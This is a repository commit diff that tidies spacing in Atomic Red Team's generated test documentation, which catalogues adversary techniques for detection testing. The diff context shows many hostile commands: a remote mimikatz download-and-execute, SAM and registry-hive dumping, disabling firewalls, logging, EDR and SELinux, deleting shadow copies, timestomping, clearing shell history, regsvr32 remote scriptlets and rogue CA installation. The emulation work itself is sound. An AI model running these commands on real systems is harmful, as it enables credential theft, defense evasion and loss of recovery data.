security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

tidy up the spacing around command lists

Browse Source
This commit is contained in:
Brian Beyer
2018-05-21 20:54:00 +02:00
parent d91e597d93
commit c141e6253d
18 changed files with 1 additions and 50 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomic_red_team/atomic_doc_template.md.erb
+1 -1
View File
@@ -33,7 +33,7 @@
<%- else -%>
#### Run it with `<%= test['executor']['name'] %>`!
```
<%= test['executor']['command'] %>
<%= test['executor']['command'].to_s.strip %>
```
<%- end -%>
<br/>
atomics/t1002/t1002.md
-2
View File
@@ -36,7 +36,6 @@ TODO
#### Run it with `powershell`!
```
dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
```
<br/>
<br/>
@@ -50,6 +49,5 @@ TODO
#### Run it with `powershell`!
```
rar a -r #{output_file} #{input_file}
```
<br/>
atomics/t1003/t1003.md
-4
View File
@@ -164,7 +164,6 @@ Dumps Credentials via Powershell by invoking a remote mimikatz script
#### Run it with `powershell`!
```
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
```
<br/>
<br/>
@@ -178,7 +177,6 @@ https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
#### Run it with `command_prompt`!
```
gsecdump -a
```
<br/>
<br/>
@@ -192,7 +190,6 @@ http://www.ampliasecurity.com/research/windows-credentials-editor/
#### Run it with `command_prompt`!
```
wce -o #{output_file}
```
<br/>
<br/>
@@ -209,6 +206,5 @@ via three registry keys. Then processed locally using https://github.com/Neohaps
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
```
<br/>
atomics/t1046/t1046.md
-1
View File
@@ -31,6 +31,5 @@ for port in {1..65535};
do
echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
done
```
<br/>
atomics/t1087/t1087.md
-5
View File
@@ -57,7 +57,6 @@ xxx
#### Run it with `sh`!
```
cat /etc/passwd > #{output_file}
```
<br/>
<br/>
@@ -76,7 +75,6 @@ xxx (requires root)
#### Run it with `sh`!
```
cat /etc/sudoers > #{output_file}
```
<br/>
<br/>
@@ -95,7 +93,6 @@ xxx
#### Run it with `sh`!
```
grep 'x:0:' /etc/passwd > #{output_file}
```
<br/>
<br/>
@@ -109,7 +106,6 @@ xxx
#### Run it with `sh`!
```
username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
```
<br/>
<br/>
@@ -123,6 +119,5 @@ xxx
#### Run it with `sh`!
```
lastlog > #{output_file}
```
<br/>
atomics/t1089/t1089.md
-4
View File
@@ -41,7 +41,6 @@ else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
systemctl stop firewalld
systemctl disable firewalld
fi
```
<br/>
<br/>
@@ -62,7 +61,6 @@ else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
systemctl stop rsyslog
systemctl disable rsyslog
fi
```
<br/>
<br/>
@@ -83,7 +81,6 @@ else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
systemctl stop cbdaemon
systemctl disable cbdaemon
fi
```
<br/>
<br/>
@@ -97,6 +94,5 @@ Disables SELinux enforcement
#### Run it with `sh`!
```
setenforce 0
```
<br/>
atomics/t1099/t1099.md
-3
View File
@@ -37,7 +37,6 @@ Stomps on the access timestamp of a file
#### Run it with `sh`!
```
touch -a -t 197001010000.00 #{target_filename}
```
<br/>
<br/>
@@ -56,7 +55,6 @@ Stomps on the modification timestamp of a file
#### Run it with `sh`!
```
touch -m -t 197001010000.00 #{target_filename}
```
<br/>
<br/>
@@ -82,6 +80,5 @@ date -s "1970-01-01 00:00:00"
touch #{target_filename}
date -s "$NOW"
stat #{target_filename}
```
<br/>
atomics/t1105/t1105.md
-1
View File
@@ -64,6 +64,5 @@ sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp'
# Pull file from adversary using sftp
sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file
```
<br/>
atomics/t1107/t1107.md
-12
View File
@@ -59,7 +59,6 @@ mkdir /tmp/victim-files
cd /tmp/victim-files
touch a b c d e f g
echo "This file will be shredded" > /tmp/victim-shred.txt
```
<br/>
<br/>
@@ -73,7 +72,6 @@ Delete a single file from the temporary directory
#### Run it with `sh`!
```
rm -f /tmp/victim-files/a
```
<br/>
<br/>
@@ -87,7 +85,6 @@ Recursively delete the temporary directory and all files contained within it
#### Run it with `sh`!
```
rm -rf /tmp/victim-files
```
<br/>
<br/>
@@ -101,7 +98,6 @@ Use the `shred` command to overwrite the temporary file and then delete it
#### Run it with `sh`!
```
shred -u /tmp/victim-shred.txt
```
<br/>
<br/>
@@ -132,7 +128,6 @@ type nul > d
type nul > e
type nul > f
type nul > g
```
<br/>
<br/>
@@ -146,7 +141,6 @@ Delete a single file from the temporary directory using cmd.exe
#### Run it with `command_prompt`!
```
del /f %TEMP%\victim-files-cmd\a
```
<br/>
<br/>
@@ -160,7 +154,6 @@ Recursively delete the temporary directory and all files contained within it usi
#### Run it with `command_prompt`!
```
del /f /S %TEMP%\victim-files-cmd
```
<br/>
<br/>
@@ -174,7 +167,6 @@ Delete a single file from the temporary directory using Powershell
#### Run it with `powershell`!
```
Remove-Item -path %TEMP%\victim-files-ps\a
```
<br/>
<br/>
@@ -188,7 +180,6 @@ Recursively delete the temporary directory and all files contained within it usi
#### Run it with `powershell`!
```
Remove-Item -path %TEMP%\victim-files-ps -recurse
```
<br/>
<br/>
@@ -202,7 +193,6 @@ Delete all volume shadow copies with vssadmin.exe
#### Run it with `command_prompt`!
```
vssadmin.exe Delete Shadows /All /Quiet
```
<br/>
<br/>
@@ -216,7 +206,6 @@ Delete all volume shadow copies with wmic
#### Run it with `command_prompt`!
```
wmic shadowcopy delete
```
<br/>
<br/>
@@ -231,7 +220,6 @@ xxx
```
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
```
<br/>
<br/>
atomics/t1113/t1113.md
-1
View File
@@ -83,7 +83,6 @@ Use xwd command to collect a full desktop screenshot and review file with xwud
```
xwd -root -out #{output_file}
xwud -in #{output_file}
```
<br/>
<br/>
atomics/t1115/t1115.md
-1
View File
@@ -35,7 +35,6 @@ Add data to clipboard to copy off or execute commands from.
```
dir | clip
clip < readme.txt
```
<br/>
<br/>
atomics/t1117/t1117.md
-3
View File
@@ -47,7 +47,6 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
#### Run it with `command_prompt`!
```
regsvr32.exe /s /u /i:#{filename} scrobj.dll
```
<br/>
<br/>
@@ -66,7 +65,6 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
#### Run it with `command_prompt`!
```
regsvr32.exe /s /u /i:#{url} scrobj.dll
```
<br/>
<br/>
@@ -85,6 +83,5 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
#### Run it with `command_prompt`!
```
regsvr32.exe #{dll_name}
```
<br/>
atomics/t1123/t1123.md
-1
View File
@@ -38,7 +38,6 @@ Create a file called test.wma, with the duration of 30 seconds
#### Run it with `command_prompt`!
```
SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
```
<br/>
<br/>
atomics/t1130/t1130.md
-1
View File
@@ -57,6 +57,5 @@ else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -ge "7" ];
cp rootCA.crt /etc/pki/ca-trust/source/anchors/
update-ca-trust
fi
```
<br/>
atomics/t1136/t1136.md
-2
View File
@@ -36,7 +36,6 @@ Create a user via useradd
#### Run it with `bash`!
```
useradd -M -N -r -s /bin/bash -c "#{comment}" #{username}
```
<br/>
<br/>
@@ -55,6 +54,5 @@ dscl . -create /Users/#{username} RealName "#{realname}"
dscl . -create /Users/#{username} UniqueID "1010"
dscl . -create /Users/#{username} PrimaryGroupID 80
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
```
<br/>
atomics/t1139/t1139.md
-1
View File
@@ -33,6 +33,5 @@ xxxx
#### Run it with `sh`!
```
cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
```
<br/>
atomics/t1146/t1146.md
-6
View File
@@ -38,7 +38,6 @@ Clears bash history via rm
#### Run it with `sh`!
```
rm ~/.bash_history
```
<br/>
<br/>
@@ -52,7 +51,6 @@ Clears bash history via rm
#### Run it with `sh`!
```
echo "" > ~/.bash_history
```
<br/>
<br/>
@@ -66,7 +64,6 @@ Clears bash history via cat /dev/null
#### Run it with `sh`!
```
cat /dev/null > ~/.bash_history
```
<br/>
<br/>
@@ -80,7 +77,6 @@ Clears bash history via a symlink to /dev/null
#### Run it with `sh`!
```
ln -sf /dev/null ~/.bash_history
```
<br/>
<br/>
@@ -94,7 +90,6 @@ Clears bash history via truncate
#### Run it with `sh`!
```
truncate -s0 ~/.bash_history
```
<br/>
<br/>
@@ -110,6 +105,5 @@ Clears the history of a bunch of different shell types by setting the history si
unset HISTFILE
export HISTFILESIZE=0
history -c
```
<br/>
atomics/t1148/t1148.md
-1
View File
@@ -34,6 +34,5 @@ Disables history collection in shells
```
export HISTCONTROL=ignoreboth
ls #{evil_command}
```
<br/>